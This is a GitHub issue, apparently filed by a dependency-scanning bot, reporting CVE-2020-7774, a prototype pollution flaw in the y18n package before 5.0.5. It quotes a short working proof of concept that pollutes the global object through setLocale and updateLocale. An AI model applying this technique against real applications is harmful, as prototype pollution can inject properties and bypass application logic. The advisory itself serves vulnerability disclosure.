A new vulnerability was discovered: CVE-2020-7774

debricked / soot-wrapper

Analyses how you use your dependencies to figure out if you use the vulnerable parts of a vulnerable dependency

MIT License

4 stars 5 forks source link

A new vulnerability was discovered: CVE-2020-7774 #52

Closed debricked[bot] closed 2 years ago

debricked[bot] commented 3 years ago

This affects the package y18n before 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('proto'); y18n.updateLocale({polluted: true}); console.log(polluted); // true

Read more at Debricked: https://app.debricked.com/en/service/vulnerability/187733